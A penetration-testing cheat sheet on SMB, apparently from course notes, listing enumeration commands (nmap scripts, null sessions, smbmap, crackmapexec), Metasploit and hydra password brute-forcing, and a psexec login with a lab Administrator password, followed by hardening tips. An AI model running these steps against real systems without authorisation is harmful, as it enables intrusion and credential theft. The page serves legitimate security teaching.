SMB
SMB (Server Message Block) is a protocol used to manage (read, write, share) files on a network composed of Windows machines. It is commonly used to access printers within a network. Files are stored in what are called "shares," each protected by authentication (username and password). In the latest versions of SMB, access rights can be defined for each file. SMB 3.1.1 is the most recent version.
SMB uses port 445 (TCP); however, it originally ran on top of NetBIOS using port 139. SAMBA is the Linux implementation of SMB and allows Windows systems to access Linux shares and devices.
SMB is one of the most commonly exploited attack vectors on Windows systems when proper security mechanisms are not configured, potentially exposing sensitive information to attackers.
Enumeration
Nmap Scripts
nmap --script nbstat.nse <TARGET>
nmap --script smb-os-discovery <TARGET>
nmap --script smb-enum-shares -p139,445 <TARGET>
nmap --script smb-vuln* <TARGET>nbstat.nse: Gathers NetBIOS names and MAC addresses.smb-os-discovery: Enumerates OS details via SMB.smb-enum-shares: Enumerates SMB shares on a target.smb-vuln*: Checks for SMB vulnerabilities.
Basic Host Discovery
ping -a <TARGET>NetBIOS Enumeration
nbtscan <TARGET>
nmblookup -A <IP>nbtscan: Scans IP addresses for NetBIOS name tables.nmblookup: Queries NetBIOS over TCP/IP (unmaintained as of Samba 4.9).
Session Connection
The IPC$ share allows anonymous connections to perform activities like enumerating domain accounts and shares. Useful commands include:
Null Session Tools
smbclient -L <TARGET_IP> -U ""
rpcclient -U "" -N <TARGET_IP>
enum4linux -a <TARGET_IP>smbclient -L: Lists available SMB shares.rpcclient: Interacts with RPC over SMB to enumerate details.enum4linux: Comprehensive enumeration of SMB and LDAP on the target.
Windows SMB Enumeration
smbmap -H <TARGET>
net view \\<TARGET_IP> /AllUser-Specific Share Access
smbmap -H <TARGET> -u <USER> -p <PWD>
smbclient //<TARGET_IP>/<SHARE> -U <USER>%<PWD>
crackmapexec smb <TARGET_IP> -u '<USER>' -p '<PWD>' --shares
python3 lookupsid.py <DOMAIN>/<USER>:<PWD>@<TARGET_IP>smbmap: Lists accessible shares.crackmapexec: Automates SMB enumeration and testing.lookupsid.py: Enumerates security identifiers (SID) via SMB (Impacket tool).
Metasploit Framework
Enumerate Shares
use auxiliary/scanner/smb/smb_enumshares
set rhosts <TARGET_IP>
set smbuser <USER>
set smbpass <PWD>
exploitEnumerate SIDs
use auxiliary/scanner/smb/smb_lookupsid
set rhosts <TARGET_IP>
set smbuser <USER>
set smbpass <PWD>
exploitEnumerate Login
use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set RHOSTS <TARGET>
set VERBOSE false
exploit
hydra -l <USER> -P /usr/share/wordlists/metasploit/unix_passwords.txt <TARGET> smbPsExec
use exploit/windows/smb/psexec
set RHOSTS demo.ine.local
set SMBUser Administrator
set SMBPass qwertyuiop
exploitTools Overview
nbtscan: Scans for NetBIOS names across subnets.smbmap: Lists shares, access levels, and permissions for a target.smbclient: CLI tool to interact with SMB shares (part of Samba).crackmapexec: A versatile tool for pentesting Active Directory, SMB, and more.Impacket Tools: Includes tools like
lookupsid.py,smbexec.py, and others for SMB testing.nmblookup: Queries NetBIOS names over TCP/IP.
NetBIOS Name Types
Type
Hex Code
Description
Unique Names
00
Workstation Service (workstation name)
03
Windows Messenger service
06
Remote Access Service
20
File Service (Host Record)
21
Remote Access Service client
1B
Domain Master Browser (Primary Domain Controller for a domain)
1D
Master Browser
Group Names
00
Workstation Service (workgroup/domain name)
1C
Domain Controllers for a domain
1E
Browser Service Elections
Security Best Practices
Avoid Plaintext Passwords: Use environment variables or credential files instead of inline passwords.
Disable Null Sessions: Configure SMB servers to block unauthenticated access.
Encrypt Traffic: Use SMB over TLS (SMBv3) to protect data in transit.
Last updated